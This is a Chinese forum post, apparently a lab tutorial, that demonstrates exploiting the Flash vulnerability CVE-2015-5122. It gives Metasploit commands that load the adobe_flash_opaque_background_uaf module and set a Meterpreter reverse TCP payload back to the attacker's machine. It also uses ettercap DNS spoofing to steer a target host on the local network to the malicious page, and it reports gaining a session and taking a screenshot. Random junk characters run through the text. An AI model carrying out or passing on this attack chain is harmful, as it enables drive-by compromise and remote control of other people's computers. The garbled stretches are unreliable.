cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

: p$ K5 y" E7 Q# |- n# Y 二、cve2015-5122漏洞实例演示虚拟机 2 j; j; X, Q: T* ~# q7 [+ g, i

# T+ ?* }" o! ^: v# u 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： ) e& j; ?# K. _ q1 l

9 x B6 y0 r# P! f8 x search cve-2015-5122如图： 7 d$ \" k5 x- V9 h

+ K$ ]4 x- Y" v! I; s1 V % r t9 ]( o) C3 g- j+ L

5 r: ]. _4 E8 c0 e8 {5 M 下面我们敲如下命令： 9 V; N+ ]1 S7 K4 _+ c

) x0 \! J+ { r& A use exploit/multi/browser/adobe_flash_opaque_background_uaf % s5 r% b1 M. l& H* \! O

. Q/ e& m( y+ ~9 ^5 ~( |( Y set PAYLOAD windows/meterpreter/reverse_tcp 3 H% s& V* Y4 o! S. u' g

) C- s7 w+ I! B0 I set LHOST 192.168.0.109 * G2 U y( f [6 x9 m

) l1 B- B* Z5 m% K set URIPATH / /*根目录*/ ; ^! |* Q3 [! F% T8 m8 O/ x3 r

* \, J# Q8 k+ A set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 9 I5 w% j1 Y: k' X' O$ K

( ?% |+ V2 b9 T set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ' }" G, s4 g0 `9 y/ i8 Y h

. h) \4 `0 x: J2 s# u( ` 然后show options如图： ) m; T7 J% Z0 ^% W4 G/ Q

& g0 d2 g3 q2 o. W % e# @* Y1 I, d, X2 r

( Z" B. e9 I9 i2 B4 x; r: g 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
[8 g& k/ V/ e' H. \ h4 v/ {) m1 E/ Q5 W; \: y3 ]# C

* n9 B1 {. m6 ]5 C 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 ( ~/ i& O# P" S/ G; ~

# ~2 m4 I* ~/ ~2 V' ~ Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf - `8 e4 E- l4 k" u: n. `* N

, t7 N. d* D1 |& M- c, `2 q . j; w7 J5 B" r0 H( j

\" G9 o) W: m5 r: e! A0 X; b% w! v 成功了，这时候我们断开ettercap，如图： : d3 J5 `" I; a- m- M, A( F

0 w* K" {: E+ j1 m8 B3 B# `& v ; \, f, l+ Y! H! c- [8 X4 B9 U

/ o( C7 a! C& Y4 l% K7 O Screenshot如图： ( U" J' D' S! C& \: D/ y

/ ]* e4 j; o2 z; X1 J / R/ E5 f) G3 r0 {

7 w; D" c- u" }9 c0 Y/ G" t ' Z# m$ t8 t) f7 E( F

		自动登录	找回密码
密码			立即注册